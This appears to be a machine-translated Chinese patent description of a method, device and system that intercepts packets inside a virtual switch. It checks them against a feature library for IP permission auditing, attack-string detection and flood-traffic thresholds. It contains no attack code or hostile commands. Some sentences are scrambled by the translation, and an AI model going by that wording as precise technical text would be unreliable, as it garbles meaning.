Embodiment
For making the object of the embodiment of the present invention, technical scheme and advantage clearly, below in conjunction with the accompanying drawing in the embodiment of the present invention, technical scheme in the embodiment of the present invention is clearly and completely described, obviously, described embodiment is the present invention's part embodiment, instead of whole embodiments.Based on the embodiment in the present invention, those of ordinary skill in the art, not making the every other embodiment obtained under creative work prerequisite, belong to the scope of protection of the invention.
Fig. 1 is the flow chart of a kind of virtual platform safety protecting method based on virtual switch that the embodiment of the present invention provides, and as shown in Figure 1, the method specifically comprises:
Step 101, receive the packet that the first interface in virtual switch sends, described first interface is for sending to the packet of the second equipment to tackle to the communication link in described virtual switch, the first equipment;
Virtual platform comprises at least one physical machine, a physical machine can be invented multiple stage virtual machine by Intel Virtualization Technology, and on virtual platform virtual out at least one virtual switch.Wherein, each virtual machine can run different operating system and application, between different virtual machines, and can carry out communication interaction by virtual switch between virtual machine and physical machine.
Because the type of the mutual communicating pair of the enterprising Serial Communication of virtual platform is more, comprise: virtual machine sends packet by virtual switch to virtual machine, or physical machine sends packet by virtual switch to virtual machine, virtual machine sends packet by virtual switch to physical machine.Therefore, in order to the virtual platform safety protecting method based on virtual switch that clearer explanation the present embodiment provides, be specifically described for executive agent carries out communication interaction by virtual switch for the first equipment on virtual platform and the second equipment.Wherein, the first equipment comprises: physical machine or virtual machine; Second equipment comprises: physical machine or virtual machine.
The first interface arranged in virtual switch in advance, first interface is for sending to the packet of the second equipment to tackle to the communication link in virtual switch, the first equipment.It should be noted that, the position of first interface can need to select on the communication link according to practical application, such as: the entrance of communication link, or centre position, namely all can as the setting position of first interface by the position that communication link flows out before virtual switch at packet.
It should be noted that, the generating mode of first interface has a lot, can select according to application needs, the present embodiment does not limit this, illustrate as follows: can be generated in virtual switch by hook Hook program, also can obtain from the control centre virtual platform the interface be cured and install.
When the communication link that the first equipment is set up in advance by virtual switch is to the second equipment sending data bag, first interface for tackling the packet on communication link, and sends to data characteristics storehouse to carry out safety detection.
Step 102, adopt data characteristics storehouse to detect described packet and whether meet default network security policy, described data characteristics storehouse comprises: with described network security policy characteristic of correspondence information;
Be previously provided with data characteristics storehouse in virtual switch, include in data characteristics storehouse and network security policy characteristic of correspondence information.Wherein, network security policy comprises: at least one in network legal power audit, network attack detection and flow invasion, can arrange according to the type of service of network application environment and virtual machine and physical machine, the present embodiment does not limit this.Because network security policy is different, therefore, the particular content of characteristic of correspondence information is not identical with the form of expression yet.
When data characteristics storehouse by first interface receive the first equipment send to the packet of the second equipment time, adopt in data characteristics storehouse whether meet default network security policy with this packet of network security policy characteristic of correspondence infomation detection.Because the characteristic information of network security policy is different, therefore, concrete testing process and criterion are also different, can be specifically introduced in subsequent embodiment.
If judge, step 103, knows that described packet meets described network security policy, then give described second equipment by the second interface in described virtual switch by the Packet Generation through safety detection.
If data characteristics storehouse according to network security policy characteristic of correspondence information, judge to know that this packet meets default network security policy, then illustrate that this packet does not have the threat of network attack to the equipment on virtual platform, virtual switch can be passed through, therefore, the second interface is given, to give the second equipment by the second interface by the Packet Generation through safety detection by the Packet Generation through safety detection.
It should be noted that, the second interface is used for forwarding the packet through data characteristics storehouse safety detection.It should be noted that the position of the second interface can need to select on the communication link according to practical application, such as: the outlet of communication link, or the position between first interface to outlet.
It should be noted that, the generating mode of the second interface has a lot, can select according to application needs, the present embodiment does not limit this, illustrate as follows: can be generated in virtual switch by hook Hook program, also can obtain from the control centre virtual platform the interface be cured and install.
The virtual platform safety protecting method based on virtual switch that the present embodiment provides, by the first interface in virtual switch on the communication link in virtual switch, the first equipment sends to the packet of the second equipment to tackle, adopt in data characteristics storehouse with network security policy characteristic of correspondence infomation detection packet whether safety, if so, then the second equipment is sent to by the second interface in virtual switch.Thus avoid and the communication flows in virtual switch is imported to external system carry out safety detection, improve the treatment effeciency of safety detection, and reduce the time delay of communication interaction.
Fig. 2 is the flow chart of the another kind that provides of the embodiment of the present invention based on the virtual platform safety protecting method of virtual switch, and the present embodiment is described in detail and in virtual switch, generated first interface by hook Hook program; And/or second process of interface, and detect security protection process when knowing that packet is dangerous, as shown in Figure 2, the method specifically comprises:
Step 201, application hooks subprogram arranges the first registration point for tackling described packet on described communication link, and carries out encapsulation to described first registration point and set up described first interface; And/or application hooks subprogram arranges the second registration point for forwarding described packet on described communication link, and encapsulation is carried out to described second registration point set up described second interface;
Application hook Hook program arranges the first registration point for data interception bag on the communication link of virtual switch, and carries out encapsulation to the first registration point and set up first interface.First registration point is the anchor point directly arranged on the communication link for tackling the packet on communication link, the object encapsulated this first registration point realizes the first interface corresponding with interception function, namely in other words, exactly interception mark is stamped to the first registration point, when making packet arrive this first registration point, this packet is tackled.
And/or,
Application hooks subprogram arranges the second registration point for forwarding data bag on the communication link, and carries out encapsulation to the second registration point and set up described second interface.Second registration point is the anchor point directly arranged on the communication link for forwarding after safety detection the packet on communication link, the object encapsulated this second registration point realizes second interface corresponding with forwarding capability, namely in other words, exactly the second registration point is stamped and forward mark, when making packet arrive this second registration point, this packet is forwarded.
Step 202, receive the packet that the first interface in virtual switch sends, described first interface is for sending to the packet of the second equipment to tackle to the communication link in described virtual switch, the first equipment;
When the communication link that the first equipment is set up in advance by virtual switch is to the second equipment sending data bag, first interface for tackling the packet on communication link, and sends to data characteristics storehouse to carry out safety detection.
Step 203, adopt data characteristics storehouse to detect described packet and whether meet default network security policy, described data characteristics storehouse comprises: with described network security policy characteristic of correspondence information;
When data characteristics storehouse by first interface receive the first equipment send to the packet of the second equipment time, adopt in data characteristics storehouse whether meet default network security policy with this packet of network security policy characteristic of correspondence infomation detection.Because the characteristic information of network security policy is different, therefore, concrete testing process and criterion are also different, can be specifically introduced in subsequent embodiment.
If judge, step 204, knows that described packet meets described network security policy, then give described second equipment by the second interface in described virtual switch by the Packet Generation through safety detection; Know that described packet does not meet described network security policy if judge, then according to the Cyberthreat type in described network security policy, security protection process is carried out to described packet.
If data characteristics storehouse according to network security policy characteristic of correspondence information, judge to know that this packet meets default network security policy, then illustrate that this packet does not have the threat of network attack to the equipment on virtual platform, virtual switch can be passed through, therefore, the second interface is given, to give the second equipment by the second interface by the Packet Generation through safety detection by the Packet Generation through safety detection.
If data characteristics storehouse according to network security policy characteristic of correspondence information, judge to know that this packet does not meet network security policy, then according to the Cyberthreat type in network security policy, security protection process is carried out to packet, to ensure that this packet with Cyberthreat can not flow out virtual switch and arrive the second equipment.
The virtual platform safety protecting method based on virtual switch that the present embodiment provides, the first interface arranged by adopting hook program in virtual switch on the communication link in virtual switch, the first equipment sends to the packet of the second equipment to tackle, adopt in data characteristics storehouse with network security policy characteristic of correspondence infomation detection packet whether safety, if, the second interface then by adopting hook program to arrange in virtual switch sends to the second equipment, if not, then security protection process is carried out to packet.Thus avoid and the communication flows in virtual switch is imported to external system carry out safety detection, improve the treatment effeciency of safety detection, and reduce the time delay of communication interaction, and further increasing the fail safe of virtual platform.
For embodiment described in Fig. 2, because network security policy is different, therefore, the characteristic information of network security policy, and concrete testing process is also different with criterion, in order to the process of safety detection is carried out in the above-mentioned employing data characteristics of explanation clearly storehouse to packet, and when judgement knows that described packet does not meet described network security policy, according to the Cyberthreat type in described network security policy, packet is carried out to the process of security protection process, be specifically described by embodiment described in Fig. 3-Fig. 5.
Fig. 3 is the flow chart of the another kind that provides of the embodiment of the present invention based on the virtual platform safety protecting method of virtual switch, the present embodiment is safety detection process when being network legal power audit for network security policy, and when packet is the Cyberthreat type of network legal power audit, packet is carried out to the process of security protection process, as shown in Figure 3, the method specifically comprises:
Step 301, obtains the network access authority information corresponding with the source IP of described packet;
Particularly, when network security policy is network legal power audit, comprise with network security policy characteristic of correspondence information: IP address information, and the network access authority information corresponding with IP address information.
When data characteristics storehouse receives the packet of first interface transmission, resolution data bag obtains source IP address and the object IP address of this packet.Then IP address information in the characteristic information prestored is inquired about, and the network access authority information corresponding with IP address information, obtain the network access authority information corresponding with the source IP of this packet.
Step 302, audits according to the legitimacy of described network access authority infomation detection to object IP;
The legitimacy of network access authority infomation detection to object IP according to obtaining is audited, and namely judges whether this source IP has permission Internet resources corresponding to access object IP according to this network access authority information.Know that if judge source IP has permission Internet resources corresponding to access object IP, then object IP is legal, and this Packet Generation, by safety detection, is given the second equipment by the second interface by this packet.Know that if judge source IP does not have authority to access Internet resources corresponding to object IP, then object IP is illegal, and this packet by safety detection, does not need to carry out security protection process to packet.
If judge, step 303, knows that described object IP is illegal, then according to described, described network access authority information is revised as lawful authority IP to described object IP, and give described second interface by amended Packet Generation.
Know that if judge source IP does not have authority to access Internet resources corresponding to object IP, then object IP is illegal, this packet does not pass through safety detection, therefore, object IP is revised as lawful authority IP by the network access authority information according to obtaining, and give the second interface by amended Packet Generation, give the second equipment by the second interface by this Packet Generation.
The virtual platform safety protecting method based on virtual switch that the present embodiment provides, by characteristic of correspondence infomation detection packet whether safety of auditing with network legal power in data characteristics storehouse, if, then send to the second equipment by the second interface in virtual switch, if not, then guarantee the repair free of charge to data the packet changing legitimate access rights into forward.Thus improve the fail safe of virtual platform.
Fig. 4 is the flow chart of the another kind that provides of the embodiment of the present invention based on the virtual platform safety protecting method of virtual switch, the present embodiment is safety detection process when being network attack detection for network security policy, and when packet is the Cyberthreat type of network attack detection, packet is carried out to the process of security protection process, as shown in Figure 4, the method specifically comprises:
Step 401, determines the communication protocol that described packet is applied;
Particularly, when network security policy is network attack detection, comprise with network security policy characteristic of correspondence information: the critical field corresponding with the communication protocol of packet, and attack the descriptor of character string.
When data characteristics storehouse receives the packet of first interface transmission, the communication protocol of resolution data bag determination packet application.The communication protocol of this packet application is obtained from the header file information of this packet.Communication protocol specifically comprises: the standard agreement of HTML (Hypertext Markup Language), Internet Tele Sign-On services, and Simple Mail Transfer protocol.
Step 402, obtains the data message in the critical field corresponding with described communication protocol, judges the descriptor whether comprising described attack character string in the data message in described critical field;
Inquire about critical field corresponding with the communication protocol of packet in the characteristic information prestored, and attack the descriptor of character string.From the critical field corresponding with this communication protocol, obtain data message, judge the descriptor whether comprising attack character string corresponding with communication protocol in characteristic information in the data message in critical field.Know that if judge the data message in critical field does not comprise the descriptor of attacking character string, this Packet Generation, by safety detection, is given the second equipment by the second interface by this packet.Know that if judge the data message in critical field comprises the descriptor of attacking character string, this packet by safety detection, does not need to carry out security protection process to packet.
Step 403, knows that if judge the data message in described critical field comprises the descriptor of attacking character string, then abandons described packet; Or, obtain the packet meeting described network security policy after filtration treatment is carried out to described packet, and send to described second interface.
Know that if judge the data message in critical field comprises the descriptor of attacking character string, this packet by safety detection, therefore, does not then abandon this packet; Or, obtain the packet meeting network security policy after filtration treatment is carried out to this packet, and send to described second interface, give the second equipment by the second interface by this Packet Generation.
The virtual platform safety protecting method based on virtual switch that the present embodiment provides, by in data characteristics storehouse with network attack detection characteristic of correspondence infomation detection packet whether safety, if, then send to the second equipment by the second interface in virtual switch, if not, then packet is abandoned or filtration treatment.Thus improve the fail safe of virtual platform.
Fig. 5 is the flow chart of the another kind that provides of the embodiment of the present invention based on the virtual platform safety protecting method of virtual switch, the present embodiment is safety detection process when being flow invasion for network security policy, and when packet is the Cyberthreat type of flow invasion, packet is carried out to the process of security protection process, as shown in Figure 5, the method specifically comprises:
Step 501, mates the header file information of described packet, the form of intermediate file and the form of ends file with the format information in described characteristic information;
Particularly, when network security policy is flow invasion, comprise with network security policy characteristic of correspondence information: the format information of packet, and the interior flow threshold corresponding with described format information of Preset Time, wherein, described format information comprises: at least one in the form of header file information, intermediate file and the form of ends file.
When data characteristics storehouse receives the packet of first interface transmission, resolution data bag, mates the header file information of packet, the form of intermediate file and the form of ends file with the format information in characteristic information.The data format of such as DDOS attack, if in Preset Time end there is the packet of the data format of DDOS attack flow exceed default flow threshold, then illustrate that its object is exactly the process resource that will consume counterpart device in a large number, make its system crash.
Step 502, judges whether the flow of the packet that the match is successful in Preset Time exceedes default flow threshold;
Inquire about in the characteristic information prestored, judge whether the flow of the packet that the match is successful in Preset Time exceedes default flow threshold.Know that the flow in Preset Time is less than or equal to default flow threshold if judge, this Packet Generation, by safety detection, is given the second equipment by the second interface by this packet.Know that the flow in Preset Time is more than or equal to default flow threshold if judge, this packet by safety detection, does not need to carry out security protection process to packet.
Step 503, what know the packet that in Preset Time, the match is successful if judge flows exceed described flow threshold, then abandon described packet.
What know the packet that in Preset Time, the match is successful if judge flows exceed flow threshold, and this packet by safety detection, therefore, does not then abandon this packet.
The virtual platform safety protecting method based on virtual switch that the present embodiment provides, by invading characteristic of correspondence infomation detection packet whether safety in data characteristics storehouse with flow, if, then send to the second equipment by the second interface in virtual switch, if not, then packet is abandoned.Thus improve the fail safe of virtual platform.
Fig. 6 is the structural representation of a kind of virtual platform safety device based on virtual switch that the embodiment of the present invention provides, and as shown in Figure 6, this device comprises: receiver module 11, detection module 12 and sending module 13, wherein,
Receiver module 11, the packet that the first interface for receiving in virtual switch sends, described first interface is for sending to the packet of the second equipment to tackle to the communication link in described virtual switch, the first equipment;
Detection module 12, detect described packet for adopting data characteristics storehouse and whether meet default network security policy, described data characteristics storehouse comprises: with described network security policy characteristic of correspondence information;
Sending module 13, if know that described packet meets described network security policy for judging, then gives described second equipment by the second interface in described virtual switch by the Packet Generation through safety detection.
The function based on each module in the virtual platform safety device of virtual switch that the present embodiment provides and handling process, can see the embodiment of the method shown in above-mentioned Fig. 1, and it is similar that it realizes principle, repeats no more herein.
The virtual platform safety device based on virtual switch that the present embodiment provides, by the first interface in virtual switch on the communication link in virtual switch, the first equipment sends to the packet of the second equipment to tackle, adopt in data characteristics storehouse with network security policy characteristic of correspondence infomation detection packet whether safety, if so, then the second equipment is sent to by the second interface in virtual switch.Thus avoid and the communication flows in virtual switch is imported to external system carry out safety detection, improve the treatment effeciency of safety detection, and reduce the time delay of communication interaction.
Fig. 7 is the structural representation of the another kind that provides of the embodiment of the present invention based on the virtual platform safety device of virtual switch, and as shown in Figure 7, based on embodiment illustrated in fig. 6, this device also comprises: arrange module 14 and processing module 15, wherein,
Module 14 is set, the first registration point for tackling described packet is set on described communication link for application hooks subprogram, and encapsulation is carried out to described first registration point set up described first interface; And/or application hooks subprogram arranges the second registration point for forwarding described packet on described communication link, and encapsulation is carried out to described second registration point set up described second interface.
Processing module 15, if know that described packet does not meet described network security policy for judging, then according to the Cyberthreat type in described network security policy, carries out security protection process to described packet.
The function based on each module in the virtual platform safety device of virtual switch that the present embodiment provides and handling process, can see the embodiment of the method shown in above-mentioned Fig. 2, and it is similar that it realizes principle, repeats no more herein.
The virtual platform safety device based on virtual switch that the present embodiment provides, the first interface arranged by adopting hook program in virtual switch on the communication link in virtual switch, the first equipment sends to the packet of the second equipment to tackle, adopt in data characteristics storehouse with network security policy characteristic of correspondence infomation detection packet whether safety, if, the second interface then by adopting hook program to arrange in virtual switch sends to the second equipment, if not, then security protection process is carried out to packet.Thus avoid and the communication flows in virtual switch is imported to external system carry out safety detection, improve the treatment effeciency of safety detection, and reduce the time delay of communication interaction, and further increasing the fail safe of virtual platform.
Fig. 8 is the structural representation of the another kind that provides of the embodiment of the present invention based on the virtual platform safety device of virtual switch, described network security policy is network legal power audit, described and described network security policy characteristic of correspondence information comprises: IP address information, and the network access authority information corresponding with IP address information; As shown in Figure 8, based on embodiment illustrated in fig. 7, this detection module 12 comprises: acquiring unit 121 and auditable unit 122, wherein,
Acquiring unit 121, for obtaining the network access authority information corresponding with the source IP of described packet;
Auditable unit 122, for auditing according to the legitimacy of described network access authority infomation detection to object IP;
Processing module 15, specifically for:
Know that described object IP is illegal if judge, then according to described, described network access authority information is revised as lawful authority IP to described object IP, and give described second interface by amended Packet Generation.
The function based on each module in the virtual platform safety device of virtual switch that the present embodiment provides and handling process, can see the embodiment of the method shown in above-mentioned Fig. 3, and it is similar that it realizes principle, repeats no more herein.
The virtual platform safety device based on virtual switch that the present embodiment provides, by characteristic of correspondence infomation detection packet whether safety of auditing with network legal power in data characteristics storehouse, if, then send to the second equipment by the second interface in virtual switch, if not, then guarantee the repair free of charge to data the packet changing legitimate access rights into forward.Thus improve the fail safe of virtual platform.
Fig. 9 is the structural representation of the another kind that provides of the embodiment of the present invention based on the virtual platform safety device of virtual switch, described network security policy is network attack detection, described and described network security policy characteristic of correspondence information comprises: the critical field corresponding with the communication protocol of packet, and attacks the descriptor of character string; As shown in Figure 9, based on embodiment illustrated in fig. 7, this detection module 12 comprises: determining unit 123 and the first judging unit 124, wherein,
Determining unit 123, for determining the communication protocol that described packet is applied;
First judging unit 124, for obtaining the data message in the critical field corresponding with described communication protocol, judges the descriptor whether comprising described attack character string in the data message in described critical field;
Processing module 15, specifically for:
Know that if judge the data message in described critical field comprises the descriptor of attacking character string, then abandon described packet; Or, obtain the packet meeting described network security policy after filtration treatment is carried out to described packet, and send to described second interface.
The function based on each module in the virtual platform safety device of virtual switch that the present embodiment provides and handling process, can see the embodiment of the method shown in above-mentioned Fig. 3, and it is similar that it realizes principle, repeats no more herein.
The virtual platform safety device based on virtual switch that the present embodiment provides, by in data characteristics storehouse with network attack detection characteristic of correspondence infomation detection packet whether safety, if, then send to the second equipment by the second interface in virtual switch, if not, then packet is abandoned or filtration treatment.Thus improve the fail safe of virtual platform.
Figure 10 is the structural representation of the another kind that provides of the embodiment of the present invention based on the virtual platform safety device of virtual switch, described network security policy is flow invasion, described and described network security policy characteristic of correspondence information comprises: the format information of packet, and the interior flow threshold corresponding with described format information of Preset Time, wherein, described format information comprises: at least one in the form of header file information, intermediate file and the form of ends file; As shown in Figure 10, based on embodiment illustrated in fig. 7, this detection module 12 comprises: matching unit 125 and the second judging unit 126, wherein,
Matching unit 125, for mating the header file information of described packet, the form of intermediate file and the form of ends file with the format information in described characteristic information;
Second judging unit 126, for judging whether the flow of the packet that the match is successful in Preset Time exceedes default flow threshold;
Processing module 15, specifically for:
What know the packet that in Preset Time, the match is successful if judge flows exceed described flow threshold, then abandon described packet.
The function based on each module in the virtual platform safety device of virtual switch that the present embodiment provides and handling process, can see the embodiment of the method shown in above-mentioned Fig. 3, and it is similar that it realizes principle, repeats no more herein.
The virtual platform safety device based on virtual switch that the present embodiment provides, by invading characteristic of correspondence infomation detection packet whether safety in data characteristics storehouse with flow, if, then send to the second equipment by the second interface in virtual switch, if not, then packet is abandoned.Thus improve the fail safe of virtual platform.
Figure 11 is the structural representation of a kind of virtual platform security protection system based on virtual switch that the embodiment of the present invention provides, as shown in figure 11, this system comprises: be positioned at the first equipment 1 on virtual platform, second equipment 2, and the virtual switch 3 be deployed in physical machine, wherein, described first equipment 1 and the second equipment 2 include: the physical machine 4 on virtual platform, or, be deployed in the virtual machine 5 in physical machine, described virtual switch 3 comprises the virtual platform safety device 6 based on virtual switch, embodiment illustrated in fig. 11 is the first virtual machine with the first equipment 1, and second equipment 2 be that to carry out communication interaction by virtual switch 3 be that example carries out example to the second virtual machine.
The function based on each module in the virtual platform security protection system of virtual switch that the present embodiment provides and handling process, can see above-mentioned shown embodiment of the method, and it is similar that it realizes principle, repeats no more herein.
The virtual platform security protection system based on virtual switch that the present embodiment provides, by the first interface in virtual switch on the communication link in virtual switch, the first equipment sends to the packet of the second equipment to tackle, adopt in data characteristics storehouse with network security policy characteristic of correspondence infomation detection packet whether safety, if so, then the second equipment is sent to by the second interface in virtual switch.Thus avoid and the communication flows in virtual switch is imported to external system carry out safety detection, improve the treatment effeciency of safety detection, and reduce the time delay of communication interaction.
Embodiments provide following technical scheme:
A1, a kind of virtual platform safety protecting method based on virtual switch, it is characterized in that, described method comprises:
Receive the packet that the first interface in virtual switch sends, described first interface is for sending to the packet of the second equipment to tackle to the communication link in described virtual switch, the first equipment;
Adopt data characteristics storehouse to detect described packet and whether meet default network security policy, described data characteristics storehouse comprises: with described network security policy characteristic of correspondence information;
Know that described packet meets described network security policy if judge, then give described second equipment by the second interface in described virtual switch by the Packet Generation through safety detection.
A2, method according to claim A1, is characterized in that, before the packet that the first interface in described reception virtual switch sends, also comprises:
Application hooks subprogram arranges the first registration point for tackling described packet on described communication link, and carries out encapsulation to described first registration point and set up described first interface;
And/or,
Application hooks subprogram arranges the second registration point for forwarding described packet on described communication link, and carries out encapsulation to described second registration point and set up described second interface.
A3, method according to claim A1 or A2, is characterized in that, also comprise:
Know that described packet does not meet described network security policy if judge, then according to the Cyberthreat type in described network security policy, security protection process is carried out to described packet.
A4, method according to claim A3, it is characterized in that, described network security policy comprises:
At least one in network legal power audit, network attack detection and flow invasion.
A5, method according to claim A4, it is characterized in that, described network security policy is network legal power audit, comprises: IP address information with described network security policy characteristic of correspondence information, and the network access authority information corresponding with IP address information;
Described employing data characteristics storehouse is detected described packet and whether is met default network security policy, comprising:
Obtain the network access authority information corresponding with the source IP of described packet, audit according to the legitimacy of described network access authority infomation detection to object IP;
Described according to the Cyberthreat type in described network security policy, security protection process is carried out to described packet, comprising:
Know that described object IP is illegal if judge, then according to described, described network access authority information is revised as lawful authority IP to described object IP, and give described second interface by amended Packet Generation.
A6, method according to claim A4, it is characterized in that, described network security policy is network attack detection, comprises: the critical field corresponding with the communication protocol of packet with described network security policy characteristic of correspondence information, and attacks the descriptor of character string;
Described employing data characteristics storehouse is detected described packet and whether is met default network security policy, comprising:
Determine the communication protocol that described packet is applied;
Obtain the data message in the critical field corresponding with described communication protocol, judge the descriptor whether comprising described attack character string in the data message in described critical field;
Described according to the Cyberthreat type in described network security policy, security protection process is carried out to described packet, comprising:
Know that if judge the data message in described critical field comprises the descriptor of attacking character string, then abandon described packet; Or, obtain the packet meeting described network security policy after filtration treatment is carried out to described packet, and send to described second interface.
A7, method according to claim A4, it is characterized in that, described network security policy is flow invasion, comprise with described network security policy characteristic of correspondence information: the format information of packet, and the interior flow threshold corresponding with described format information of Preset Time, wherein, described format information comprises: at least one in the form of header file information, intermediate file and the form of ends file;
Described employing data characteristics storehouse is detected described packet and whether is met default network security policy, comprising:
The header file information of described packet, the form of intermediate file and the form of ends file are mated with the format information in described characteristic information;
Judge whether the flow of the packet that the match is successful in Preset Time exceedes default flow threshold;
Described according to the Cyberthreat type in described network security policy, security protection process is carried out to described packet, comprising:
What know the packet that in Preset Time, the match is successful if judge flows exceed described flow threshold, then abandon described packet.
B8, a kind of virtual platform safety device based on virtual switch, it is characterized in that, described device comprises:
Receiver module, the packet that the first interface for receiving in virtual switch sends, described first interface is for sending to the packet of the second equipment to tackle to the communication link in described virtual switch, the first equipment;
Detection module, detect described packet for adopting data characteristics storehouse and whether meet default network security policy, described data characteristics storehouse comprises: with described network security policy characteristic of correspondence information;
Sending module, if know that described packet meets described network security policy for judging, then gives described second equipment by the second interface in described virtual switch by the Packet Generation through safety detection.
B9, device according to claim B8, is characterized in that, also comprise:
Module is set, the first registration point for tackling described packet is set on described communication link for application hooks subprogram, and encapsulation is carried out to described first registration point set up described first interface;
And/or,
Application hooks subprogram arranges the second registration point for forwarding described packet on described communication link, and carries out encapsulation to described second registration point and set up described second interface.
B10, device according to claim B8 or B9, is characterized in that, also comprise:
Processing module, if know that described packet does not meet described network security policy for judging, then according to the Cyberthreat type in described network security policy, carries out security protection process to described packet.
B11, device according to claim B10, it is characterized in that, described network security policy comprises:
At least one in network legal power audit, network attack detection and flow invasion.
B12, device according to claim B11, it is characterized in that, described network security policy is network legal power audit, and described and described network security policy characteristic of correspondence information comprises: IP address information, and the network access authority information corresponding with IP address information;
Described detection module, comprising:
Acquiring unit, for obtaining the network access authority information corresponding with the source IP of described packet;
Auditable unit, for auditing according to the legitimacy of described network access authority infomation detection to object IP;
Described processing module, specifically for:
Know that described object IP is illegal if judge, then according to described, described network access authority information is revised as lawful authority IP to described object IP, and give described second interface by amended Packet Generation.
B13, device according to claim B11, it is characterized in that, described network security policy is network attack detection, and described and described network security policy characteristic of correspondence information comprises: the critical field corresponding with the communication protocol of packet, and attacks the descriptor of character string;
Described detection module, comprising:
Determining unit, for determining the communication protocol that described packet is applied;
First judging unit, for obtaining the data message in the critical field corresponding with described communication protocol, judges the descriptor whether comprising described attack character string in the data message in described critical field;
Described processing module, specifically for:
Know that if judge the data message in described critical field comprises the descriptor of attacking character string, then abandon described packet; Or, obtain the packet meeting described network security policy after filtration treatment is carried out to described packet, and send to described second interface.
B14, device according to claim B11, it is characterized in that, described network security policy is flow invasion, described and described network security policy characteristic of correspondence information comprises: the format information of packet, and the interior flow threshold corresponding with described format information of Preset Time, wherein, described format information comprises: at least one in the form of header file information, intermediate file and the form of ends file;
Described detection module, comprising:
Matching unit, for mating the header file information of described packet, the form of intermediate file and the form of ends file with the format information in described characteristic information;
Second judging unit, for judging whether the flow of the packet that the match is successful in Preset Time exceedes default flow threshold;
Described processing module, specifically for:
What know the packet that in Preset Time, the match is successful if judge flows exceed described flow threshold, then abandon described packet.
C15, a kind of virtual platform security protection system based on virtual switch, it is characterized in that, described system comprises: be positioned at the first equipment on virtual platform, the second equipment, and virtual switch, wherein, described first equipment and the second equipment include: the physical machine on virtual platform, or, be deployed in the virtual machine in physical machine, described virtual switch comprise as arbitrary in claim 8-14 as described in the virtual platform safety device based on virtual switch.
One of ordinary skill in the art will appreciate that: all or part of step realizing said method embodiment can have been come by the hardware that program command is relevant, aforesaid program can be stored in a computer read/write memory medium, this program, when performing, performs the step comprising said method embodiment; And aforesaid storage medium comprises: ROM, RAM, magnetic disc or CD etc. various can be program code stored medium.
Last it is noted that above each embodiment is only in order to illustrate technical scheme of the present invention, be not intended to limit; Although with reference to foregoing embodiments to invention has been detailed description, those of ordinary skill in the art is to be understood that: it still can be modified to the technical scheme described in foregoing embodiments, or carries out equivalent replacement to wherein some or all of technical characteristic; And these amendments or replacement, do not make the essence of appropriate technical solution depart from the scope of various embodiments of the present invention technical scheme.